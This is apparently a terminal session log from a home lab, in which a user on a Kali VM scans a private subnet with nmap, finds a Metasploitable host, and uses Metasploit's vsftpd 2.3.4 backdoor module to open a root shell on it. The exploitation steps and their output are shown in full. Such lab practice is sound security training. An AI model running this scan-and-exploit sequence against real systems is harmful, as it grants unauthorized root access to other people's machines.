Last login: Thu Apr  9 16:27:50 on ttys002
 ~  ssh kali@192.168.128.3                                                                                                    ok 
The authenticity of host '192.168.128.3 (192.168.128.3)' can't be established.
ED25519 key fingerprint is: SHA256:kXKpvi6WvUW+3YFe+Nm52wNLSxQr85ZpVq9IRZJxfiE
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:8: 192.168.64.10
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.128.3' (ED25519) to the list of known hosts.
kali@192.168.128.3's password: 
Linux kali 6.3.0-kali1-arm64 #1 SMP Debian 6.3.7-1kali1 (2023-06-29) aarch64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr  9 14:27:59 2026 from 192.168.64.1
┌──(kali㉿kali)-[~]
└─$ 
                                                                                                                                  
┌──(kali㉿kali)-[~]
└─$ 
                                                                                                                                  
┌──(kali㉿kali)-[~]
└─$ 
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$     


























┌──(kali㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether ea:f0:2f:00:11:3a brd ff:ff:ff:ff:ff:ff
    inet 192.168.128.3/24 brd 192.168.128.255 scope global dynamic noprefixroute eth0
       valid_lft 3508sec preferred_lft 3508sec
    inet6 fd15:7675:ca77:cedb:bd11:4e20:d4d6:9b52/64 scope global temporary dynamic 
       valid_lft 604707sec preferred_lft 85926sec
    inet6 fd15:7675:ca77:cedb:e8f0:2fff:fe00:113a/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 2591971sec preferred_lft 604771sec
    inet6 fe80::e8f0:2fff:fe00:113a/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.128.0/24   
Starting Nmap 7.94 ( https://nmap.org ) at 2026-04-09 14:59 PDT
Stats: 0:00:42 elapsed; 253 hosts completed (3 up), 3 undergoing Service Scan
Service scan Timing: About 89.29% done; ETC: 15:00 (0:00:03 remaining)
Stats: 0:00:59 elapsed; 253 hosts completed (3 up), 3 undergoing Service Scan
Service scan Timing: About 92.86% done; ETC: 15:00 (0:00:03 remaining)
Stats: 0:01:24 elapsed; 253 hosts completed (3 up), 3 undergoing Service Scan
Service scan Timing: About 92.86% done; ETC: 15:01 (0:00:05 remaining)
Stats: 0:01:54 elapsed; 253 hosts completed (3 up), 3 undergoing Service Scan
Service scan Timing: About 92.86% done; ETC: 15:01 (0:00:08 remaining)
Stats: 0:02:27 elapsed; 253 hosts completed (3 up), 3 undergoing Service Scan
Service scan Timing: About 96.43% done; ETC: 15:02 (0:00:05 remaining)
Stats: 0:02:32 elapsed; 253 hosts completed (3 up), 3 undergoing Service Scan
Service scan Timing: About 96.43% done; ETC: 15:02 (0:00:05 remaining)
Stats: 0:02:57 elapsed; 253 hosts completed (3 up), 3 undergoing Script Scan
NSE Timing: About 99.92% done; ETC: 15:02 (0:00:00 remaining)
Nmap scan report for 192.168.128.1
Host is up (0.00038s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
53/tcp    open  domain?
5000/tcp  open  rtsp
7000/tcp  open  rtsp
49152/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.94%I=7%D=4/9%Time=69D8216C%P=aarch64-unknown-linux-gnu
SF:%r(GetRequest,8E,"HTTP/1\.1\x20403\x20Forbidden\r\nContent-Length:\x200
SF:\r\nServer:\x20AirTunes/935\.7\.1\r\nX-Apple-ProcessingTime:\x209\r\nX-
SF:Apple-RequestReceivedTimestamp:\x2035729053\r\n\r\n")%r(RTSPRequest,8E,
SF:"RTSP/1\.0\x20403\x20Forbidden\r\nContent-Length:\x200\r\nServer:\x20Ai
SF:rTunes/935\.7\.1\r\nX-Apple-ProcessingTime:\x205\r\nX-Apple-RequestRece
SF:ivedTimestamp:\x2035729068\r\n\r\n")%r(HTTPOptions,8E,"HTTP/1\.1\x20403
SF:\x20Forbidden\r\nContent-Length:\x200\r\nServer:\x20AirTunes/935\.7\.1\
SF:r\nX-Apple-ProcessingTime:\x206\r\nX-Apple-RequestReceivedTimestamp:\x2
SF:035734070\r\n\r\n")%r(FourOhFourRequest,8E,"HTTP/1\.1\x20403\x20Forbidd
SF:en\r\nContent-Length:\x200\r\nServer:\x20AirTunes/935\.7\.1\r\nX-Apple-
SF:ProcessingTime:\x205\r\nX-Apple-RequestReceivedTimestamp:\x2035734083\r
SF:\n\r\n")%r(SIPOptions,A0,"RTSP/1\.0\x20403\x20Forbidden\r\nContent-Leng
SF:th:\x200\r\nServer:\x20AirTunes/935\.7\.1\r\nCSeq:\x2042\x20OPTIONS\r\n
SF:X-Apple-ProcessingTime:\x204\r\nX-Apple-RequestReceivedTimestamp:\x2035
SF:734091\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7000-TCP:V=7.94%I=7%D=4/9%Time=69D82180%P=aarch64-unknown-linux-gnu
SF:%r(GetRequest,8E,"HTTP/1\.1\x20403\x20Forbidden\r\nContent-Length:\x200
SF:\r\nServer:\x20AirTunes/935\.7\.1\r\nX-Apple-ProcessingTime:\x207\r\nX-
SF:Apple-RequestReceivedTimestamp:\x2035749080\r\n\r\n")%r(HTTPOptions,8E,
SF:"HTTP/1\.1\x20403\x20Forbidden\r\nContent-Length:\x200\r\nServer:\x20Ai
SF:rTunes/935\.7\.1\r\nX-Apple-ProcessingTime:\x206\r\nX-Apple-RequestRece
SF:ivedTimestamp:\x2035749094\r\n\r\n")%r(RTSPRequest,8E,"RTSP/1\.0\x20403
SF:\x20Forbidden\r\nContent-Length:\x200\r\nServer:\x20AirTunes/935\.7\.1\
SF:r\nX-Apple-ProcessingTime:\x206\r\nX-Apple-RequestReceivedTimestamp:\x2
SF:035749106\r\n\r\n")%r(FourOhFourRequest,8E,"HTTP/1\.1\x20403\x20Forbidd
SF:en\r\nContent-Length:\x200\r\nServer:\x20AirTunes/935\.7\.1\r\nX-Apple-
SF:ProcessingTime:\x207\r\nX-Apple-RequestReceivedTimestamp:\x2035754108\r
SF:\n\r\n")%r(SIPOptions,A0,"RTSP/1\.0\x20403\x20Forbidden\r\nContent-Leng
SF:th:\x200\r\nServer:\x20AirTunes/935\.7\.1\r\nCSeq:\x2042\x20OPTIONS\r\n
SF:X-Apple-ProcessingTime:\x208\r\nX-Apple-RequestReceivedTimestamp:\x2035
SF:754125\r\n\r\n");

Nmap scan report for 192.168.128.2
Host is up (0.0013s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  shell       Netkit rshd
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.128.3
Host is up (0.00019s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p2 Debian 1 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 180.57 seconds
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p 21 192.168.128.2
Starting Nmap 7.94 ( https://nmap.org ) at 2026-04-09 15:05 PDT
Nmap scan report for 192.168.128.2
Host is up (0.00088s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.16 seconds
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ msfconsole 
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1382 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/unix/f
use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
use exploit/unix/fileformat/ghostscript_type_confusion
use exploit/unix/fileformat/imagemagick_delegate
use exploit/unix/fileformat/metasploit_libnotify_cmd_injection
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
use exploit/unix/ftp/proftpd_133c_backdoor
use exploit/unix/ftp/proftpd_modcopy_exec
use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/f
use exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
use exploit/unix/fileformat/ghostscript_type_confusion
use exploit/unix/fileformat/imagemagick_delegate
use exploit/unix/fileformat/metasploit_libnotify_cmd_injection
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
use exploit/unix/ftp/proftpd_133c_backdoor
use exploit/unix/ftp/proftpd_modcopy_exec
use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.128.2
RHOSTS => 192.168.128.2
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.128.2    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/
                                       basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.128.2:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.128.2:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.128.2:21 - The port used by the backdoor bind listener is already open
[+] 192.168.128.2:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.128.3:44327 -> 192.168.128.2:6200) at 2026-04-09 15:11:34 -0700



whoami
root
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
hostname
metasploitable

